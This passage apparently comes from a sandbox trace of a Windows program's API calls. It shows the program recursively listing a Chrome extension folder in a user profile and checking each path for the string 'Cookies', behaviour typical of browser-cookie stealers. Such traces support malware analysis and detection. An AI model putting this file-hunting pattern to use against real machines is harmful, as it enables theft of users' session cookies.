0x8e0000 [0163.218] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925a88 [0163.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.218] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="icon_128.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" [0163.218] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.218] GetProcessHeap () returned 0x8e0000 [0163.218] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0163.218] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpSrch="Cookies") returned 0x0 [0163.218] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.218] GetProcessHeap () returned 0x8e0000 [0163.218] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0163.218] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_16.png", cAlternateFileName="")) returned 1 [0163.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.219] lstrlenW (lpString="\\") returned 1 [0163.219] GetProcessHeap () returned 0x8e0000 [0163.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0163.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0163.219] lstrlenW (lpString="icon_16.png") returned 11 [0163.219] GetProcessHeap () returned 0x8e0000 [0163.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925a88 [0163.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="icon_16.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" [0163.219] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.219] GetProcessHeap () returned 0x8e0000 [0163.219] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0163.219] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", lpSrch="Cookies") returned 0x0 [0163.219] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.219] GetProcessHeap () returned 0x8e0000 [0163.219] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0163.219] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b74730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="MAIN~1.HTM")) returned 1 [0163.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.219] lstrlenW (lpString="\\") returned 1 [0163.219] GetProcessHeap () returned 0x8e0000 [0163.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0163.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.219] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0163.219] lstrlenW (lpString="main.html") returned 9 [0163.219] GetProcessHeap () returned 0x8e0000 [0163.219] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925a88 [0163.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="main.html" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" [0163.220] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.220] GetProcessHeap () returned 0x8e0000 [0163.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0163.220] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", lpSrch="Cookies") returned 0x0 [0163.220] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.220] GetProcessHeap () returned 0x8e0000 [0163.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0163.220] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.js", cAlternateFileName="")) returned 1 [0163.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.220] lstrlenW (lpString="\\") returned 1 [0163.220] GetProcessHeap () returned 0x8e0000 [0163.220] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0163.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0163.220] lstrlenW (lpString="main.js") returned 7 [0163.220] GetProcessHeap () returned 0x8e0000 [0163.220] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925a88 [0163.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.220] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="main.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" [0163.220] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.220] GetProcessHeap () returned 0x8e0000 [0163.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0163.220] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", lpSrch="Cookies") returned 0x0 [0163.220] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.220] GetProcessHeap () returned 0x8e0000 [0163.220] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0163.220] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0163.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.220] lstrlenW (lpString="\\") returned 1 [0163.221] GetProcessHeap () returned 0x8e0000 [0163.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0163.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0163.221] lstrlenW (lpString="manifest.json") returned 13 [0163.221] GetProcessHeap () returned 0x8e0000 [0163.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x118) returned 0x925a88 [0163.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="manifest.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" [0163.221] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.221] GetProcessHeap () returned 0x8e0000 [0163.221] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0163.221] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", lpSrch="Cookies") returned 0x0 [0163.221] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.221] GetProcessHeap () returned 0x8e0000 [0163.221] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0163.221] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0163.221] lstrcmpiW (lpString1="_locales", lpString2=".") returned 1 [0163.221] lstrcmpiW (lpString1="_locales", lpString2="..") returned 1 [0163.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.221] lstrlenW (lpString="\\") returned 1 [0163.221] GetProcessHeap () returned 0x8e0000 [0163.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0163.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0163.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0163.221] lstrlenW (lpString="_locales") returned 8 [0163.221] GetProcessHeap () returned 0x8e0000 [0163.221] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10e) returned 0x925a88 [0163.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0163.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.222] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.222] GetProcessHeap () returned 0x8e0000 [0163.222] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0163.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.222] lstrlenW (lpString="\\*.*") returned 4 [0163.222] GetProcessHeap () returned 0x8e0000 [0163.222] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925ba0 [0163.222] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 